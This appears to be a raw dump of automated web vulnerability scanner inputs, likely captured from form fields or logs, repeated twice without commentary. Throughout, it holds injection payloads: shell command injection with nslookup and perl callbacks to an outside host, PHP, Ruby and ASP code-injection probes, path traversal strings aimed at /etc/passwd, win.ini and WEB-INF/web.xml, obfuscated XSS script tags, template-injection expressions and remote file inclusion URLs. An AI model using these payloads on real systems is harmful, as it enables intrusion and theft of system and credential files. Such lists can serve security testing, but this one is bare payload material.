1
7joHA7x1
${9999672+9999147}
&n934643=v934224
response.write(9722251*9248568)
'+response.write(9722251*9248568)+'
"+response.write(9722251*9248568)+"
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitrm'.'bapwmlse7fdf1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(84).chr(117).chr(75).'
"+"A".concat(70-3).concat(22*4).concat(118).concat(87).concat(103).concat(86)+(require"socket" Socket.gethostbyname("hitrn"+"rewbylrx06a03.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(101).concat(74).concat(108).concat(76)+(require'socket' Socket.gethostbyname('hitqu'+'kmzsrqss8895d.bxss.me.')[3].to_s)+'
12345'"\'\");|]*%00{%0d%0a%bf%27'????
".gethostbyname(lc("hitkc"."jhrtkhtxaf514.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(82).chr(114).chr(88)."
1Dqii679Q4O
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
)
/xfs.bxss.me
971151
'"
!(()&&!|*|*|
^(#$!@#$)(()))******
http://xfs.bxss.me
//xfs.bxss.me
/\xfs.bxss.me
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
Http://bxss.me/t/fit.txt
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
http://bxss.me/t/fit.txt%3F.jpg
";print(md5(31337));$a="
${@print(md5(31337))}
bxss.me
${@print(md5(31337))}\
'.print(md5(31337)).'
echo zfzmpd$()\ hhurlw\nz^xyu||a #' &echo zfzmpd$()\ hhurlw\nz^xyu||a #|" &echo zfzmpd$()\ hhurlw\nz^xyu||a #
&echo shwqfs$()\ rufwrp\nz^xyu||a #' &echo shwqfs$()\ rufwrp\nz^xyu||a #|" &echo shwqfs$()\ rufwrp\nz^xyu||a #
|echo shvuxh$()\ jqztjk\nz^xyu||a #' |echo shvuxh$()\ jqztjk\nz^xyu||a #|" |echo shvuxh$()\ jqztjk\nz^xyu||a #
(nslookup hitnmjdyjqygs0b2f7.bxss.me||perl -e "gethostbyname('hitnmjdyjqygs0b2f7.bxss.me')")
$(nslookup hithkkpzeavsh48dc7.bxss.me||perl -e "gethostbyname('hithkkpzeavsh48dc7.bxss.me')")
&(nslookup hitbzhpmfgpjgcc5b8.bxss.me||perl -e "gethostbyname('hitbzhpmfgpjgcc5b8.bxss.me')")&'\"`0&(nslookup hitbzhpmfgpjgcc5b8.bxss.me||perl -e "gethostbyname('hitbzhpmfgpjgcc5b8.bxss.me')")&`'
|(nslookup hitnpuxxfzaam8f1a2.bxss.me||perl -e "gethostbyname('hitnpuxxfzaam8f1a2.bxss.me')")
`(nslookup hitaypqcsjwab55514.bxss.me||perl -e "gethostbyname('hitaypqcsjwab55514.bxss.me')")`
;(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")|(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")&(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%4b64(9416)
'"()&%4b64(9284)
19219911
acu7324%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7324
acux3684%C0%BEz1%C0%BCz2a%90bcxuca3684
1}}"}}'}}1%>"%>'%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
14b64(9908)
1YZPAL[!+!]
14b64(9273)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%34%62%36%34%28%39%34%39%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
14b64(9460)
14b64(9809)
%31%3C%53%63%52%69%50%74%20%3E%34%62%36%34%289686%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\4b64(9015)\u003C/sCripT\u003E
1<ScRiPt>4b64(9734)</sCripT>
?
1}body{acu:Expre/**/SSion(4b64(9620))}
1cVEqF 4b64(9328)
1NLYIN[!+!]
1'"()&%g80y(9413)
'"()&%g80y(9945)
19978001
acu10688%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10688
acux4008%C0%BEz1%C0%BCz2a%90bcxuca4008
1g80y(9587)
19PJCC[!+!]
1g80y(9101)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%38%30%79%28%39%31%35%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1g80y(9516)
1g80y(9331)
%31%3C%53%63%52%69%50%74%20%3E%67%38%30%79%289964%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\g80y(9745)\u003C/sCripT\u003E
1<ScRiPt>g80y(9081)</sCripT>
1}body{acu:Expre/**/SSion(g80y(9768))}
1kvTdx g80y(9537)
1U8FB3[!+!]
1'"()&%wq3Q(9476)
'"()&%wq3Q(9982)
19927059
acu2343%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2343
acux10824%C0%BEz1%C0%BCz2a%90bcxuca10824
1wq3Q(9293)
1TWTSJ[!+!]
1wq3Q(9587)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%77%71%33%51%28%39%38%39%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1wq3Q(9645)
1wq3Q(9921)
%31%3C%53%63%52%69%50%74%20%3E%77%71%33%51%289294%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\wq3Q(9771)\u003C/sCripT\u003E
1<ScRiPt>wq3Q(9434)</sCripT>
1}body{acu:Expre/**/SSion(wq3Q(9221))}
18D1gR wq3Q(9703)
1DUKBN[!+!]
1'"()&%Mo87(9655)
1'"()&%bGI2(9819)
'"()&%Mo87(9115)
'"()&%bGI2(9811)
19272709
19661569
acu7949%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7949
acu4223%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4223
acux9645%C0%BEz1%C0%BCz2a%90bcxuca9645
acux4641%C0%BEz1%C0%BCz2a%90bcxuca4641
1Mo87(9389)
1bGI2(9103)
16GBSP[!+!]
1Mo87(9067)
1BKZTK[!+!]
1bGI2(9593)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%47%49%32%28%39%31%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%6F%38%37%28%39%35%31%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1Mo87(9316)
1bGI2(9280)
1Mo87(9831)
1bGI2(9623)
&n964300=v992462
${10000409+10000234}
'.gethostbyname(lc('hitsp'.'vpkcvhyiaf59a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(72).chr(105).chr(87).'
F5qeSIbs
".gethostbyname(lc("hitls"."ngmrnxbld2852.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(85).chr(112).chr(74)."
"+"A".concat(70-3).concat(22*4).concat(121).concat(69).concat(120).concat(87)+(require"socket" Socket.gethostbyname("hitst"+"jjpzxelta89b5.bxss.me.")[3].to_s)+"
1'"()&%lVBg(9285)
'+'A'.concat(70-3).concat(22*4).concat(115).concat(65).concat(103).concat(85)+(require'socket' Socket.gethostbyname('hitwy'+'yhimxzuf5d3ba.bxss.me.')[3].to_s)+'
'"()&%lVBg(9056)
1D3bKysnlAO
19282328
acu9163%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9163
acux5338%C0%BEz1%C0%BCz2a%90bcxuca5338
response.write(9232664*9766307)
'+response.write(9232664*9766307)+'
"+response.write(9232664*9766307)+"
1lVBg(9776)
1D9IKH[!+!]
1lVBg(9174)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%56%42%67%28%39%34%30%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1lVBg(9463)
1lVBg(9247)
%31%3C%53%63%52%69%50%74%20%3E%6C%56%42%67%289294%29%3C%2F%73%43%72%69%70%54%3E
echo pzsysb$()\ pzoxvx\nz^xyu||a #' &echo pzsysb$()\ pzoxvx\nz^xyu||a #|" &echo pzsysb$()\ pzoxvx\nz^xyu||a #
1\u003CScRiPt\lVBg(9458)\u003C/sCripT\u003E
&echo ffwmwo$()\ khhxbf\nz^xyu||a #' &echo ffwmwo$()\ khhxbf\nz^xyu||a #|" &echo ffwmwo$()\ khhxbf\nz^xyu||a #
|echo estwtk$()\ dmrsxz\nz^xyu||a #' |echo estwtk$()\ dmrsxz\nz^xyu||a #|" |echo estwtk$()\ dmrsxz\nz^xyu||a #
1<ScRiPt>lVBg(9636)</sCripT>
(nslookup hitzvttzitgrx4988a.bxss.me||perl -e "gethostbyname('hitzvttzitgrx4988a.bxss.me')")
$(nslookup hitsicdfjbgdjd076a.bxss.me||perl -e "gethostbyname('hitsicdfjbgdjd076a.bxss.me')")
&(nslookup hitmqntrlilrv29df2.bxss.me||perl -e "gethostbyname('hitmqntrlilrv29df2.bxss.me')")&'\"`0&(nslookup hitmqntrlilrv29df2.bxss.me||perl -e "gethostbyname('hitmqntrlilrv29df2.bxss.me')")&`'
|(nslookup hittfjapnveuufdb6c.bxss.me||perl -e "gethostbyname('hittfjapnveuufdb6c.bxss.me')")
`(nslookup hitcwtjjxlzxaa4277.bxss.me||perl -e "gethostbyname('hitcwtjjxlzxaa4277.bxss.me')")`
;(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")|(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")&(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")
1}body{acu:Expre/**/SSion(lVBg(9281))}
955448
1brJZU lVBg(9880)
1X2KIV[!+!]
1'"()&%y3SD(9885)
'"()&%y3SD(9851)
19176644
з>
1
1
1
1
7joHA7x1
1
${9999672+9999147}
1
1
&n934643=v934224
1
response.write(9722251*9248568)
1
'+response.write(9722251*9248568)+'
1
"+response.write(9722251*9248568)+"
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitrm'.'bapwmlse7fdf1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(84).chr(117).chr(75).'
"+"A".concat(70-3).concat(22*4).concat(118).concat(87).concat(103).concat(86)+(require"socket" Socket.gethostbyname("hitrn"+"rewbylrx06a03.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(101).concat(74).concat(108).concat(76)+(require'socket' Socket.gethostbyname('hitqu'+'kmzsrqss8895d.bxss.me.')[3].to_s)+'
12345'"\'\");|]*%00{%0d%0a%bf%27'????
".gethostbyname(lc("hitkc"."jhrtkhtxaf514.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(82).chr(114).chr(88)."
1Dqii679Q4O
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
)
/xfs.bxss.me
971151
'"
!(()&&!|*|*|
^(#$!@#$)(()))******
http://xfs.bxss.me
//xfs.bxss.me
/\xfs.bxss.me
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
Http://bxss.me/t/fit.txt
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
http://bxss.me/t/fit.txt%3F.jpg
";print(md5(31337));$a="
${@print(md5(31337))}
bxss.me
${@print(md5(31337))}\
'.print(md5(31337)).'
echo zfzmpd$()\ hhurlw\nz^xyu||a #' &echo zfzmpd$()\ hhurlw\nz^xyu||a #|" &echo zfzmpd$()\ hhurlw\nz^xyu||a #
&echo shwqfs$()\ rufwrp\nz^xyu||a #' &echo shwqfs$()\ rufwrp\nz^xyu||a #|" &echo shwqfs$()\ rufwrp\nz^xyu||a #
|echo shvuxh$()\ jqztjk\nz^xyu||a #' |echo shvuxh$()\ jqztjk\nz^xyu||a #|" |echo shvuxh$()\ jqztjk\nz^xyu||a #
(nslookup hitnmjdyjqygs0b2f7.bxss.me||perl -e "gethostbyname('hitnmjdyjqygs0b2f7.bxss.me')")
$(nslookup hithkkpzeavsh48dc7.bxss.me||perl -e "gethostbyname('hithkkpzeavsh48dc7.bxss.me')")
&(nslookup hitbzhpmfgpjgcc5b8.bxss.me||perl -e "gethostbyname('hitbzhpmfgpjgcc5b8.bxss.me')")&'\"`0&(nslookup hitbzhpmfgpjgcc5b8.bxss.me||perl -e "gethostbyname('hitbzhpmfgpjgcc5b8.bxss.me')")&`'
|(nslookup hitnpuxxfzaam8f1a2.bxss.me||perl -e "gethostbyname('hitnpuxxfzaam8f1a2.bxss.me')")
`(nslookup hitaypqcsjwab55514.bxss.me||perl -e "gethostbyname('hitaypqcsjwab55514.bxss.me')")`
;(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")|(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")&(nslookup hitiehlhpghykac9f6.bxss.me||perl -e "gethostbyname('hitiehlhpghykac9f6.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../../proc/version
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.././.././.././.././.././.././.././../etc/./passwd%00
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
file:///etc/passwd
/\../\../\../\../\../\../\../etc/passwd
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
